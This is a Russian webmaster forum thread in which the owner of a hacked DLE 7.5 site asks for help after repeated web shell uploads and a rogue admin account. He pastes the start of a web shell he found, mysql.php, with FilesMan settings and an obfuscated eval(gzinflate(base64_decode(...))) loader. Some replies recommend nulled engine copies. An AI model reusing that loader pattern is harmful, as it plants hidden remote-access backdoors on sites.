- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Ни с того, ни с сего недавно сайт перестал открываться, чистый лист и все. Полазил по ftp - все на месте, измененных файлов вроде нет. Это что такое? Дыры недавно все закрывал. Двиг нуленый, не может быть так что разработчик как-то его отключил, так как при закрытии дыр я использовал файлы с офиц сайта?
урл в ЛС гляну 🍿
Ни с того, ни с сего недавно сайт перестал открываться, чистый лист и все. Полазил по ftp - все на месте, измененных файлов вроде нет. Это что такое? Дыры недавно все закрывал. Двиг нуленый, не может быть так что разработчик как-то его отключил, так как при закрытии дыр я использовал файлы с офиц сайта?
включи отображение ошибок и попробуй открыть.
проверь базу (пароль, объем на глаз)
включи отображение ошибок и попробуй открыть.
проверь базу (пароль, объем на глаз)
Где включить? По моему у меня как раз ошибки выводятся, просто тут почему то белый лист. Например при заходе на /admin.php пишет
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ')' in .../www/engine/data/config.php on line 229
Я бекап заказал от вчерашнего дня, но видимо опять взломали, думал все дыры закрыл. Месяц все тихо было. Сейчас опять. Нашел файл mysql.php в engine от 10.12.2010 с таким содержанием -
$auth_pass = "b238ee591d1179...";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62 \x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+ yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl+cnr7pnsG37pPne4en9udKhX39978Y/JTmkRs+GbnTOGJt5oShc122ngfByHetKrNO....
Raskrutchik добавил 15.12.2010 в 01:02
Все разобрался. Из за этого файла была проблема - в print.php было написано
Люди посоветуйте способы защиты нестандартные. Мне постоянно такие файлы заливают. DLE 7.5. Все известные дыры из паба закрыты. Доступ по ftp только по моему ip. В панели хостинга логи заходов только мои. Заливают как-то через сам сайт.
Люди посоветуйте способы защиты нестандартные. Мне постоянно такие файлы заливают. DLE 7.5. Все известные дыры из паба закрыты. Доступ по ftp только по моему ip. В панели хостинга логи заходов только мои. Заливают как-то через сам сайт.
Обновить версию движка до более актуальной, хотя бы до версии 8.3 ☝ И не нулл, а оригинал и сгенерить ключ
Обновить версию движка до более актуальной, хотя бы до версии 8.3 ☝
А смысл. Мне кажется проще закрыть все дыры текущего, чем потом новые закрывать, нет?
А смысл. Мне кажется проще закрыть все дыры текущего, чем потом новые закрывать, нет?
если проект серьезный, купи лицензию скрипта и перейди. надежнее будет
у меня есть пару варезников на 8.3 и пока все спокойно
если нет желания обновляться то лучше проверить еще раз все ли залатано здесь
Если качаете нулл, то качайте с известных DLE ных сайтов и не будет проблем
у меня есть пару варезников на 8.3 и пока все спокойно
если нет желания обновляться то лучше проверить еще раз все ли залатано здесь
Оттуда все заплатки стоят. Двигом пользуюсь уже год, проблемы начались месяц назад. Заливаются шеллы. Появляется еще один админ. Обновляться сложно, много доп модулей и все такое, лучше защиту поставить. Такая прокатит - http://www.wfound.ru/cms/dle/25359-zashhita-adminki-v-dle.html ?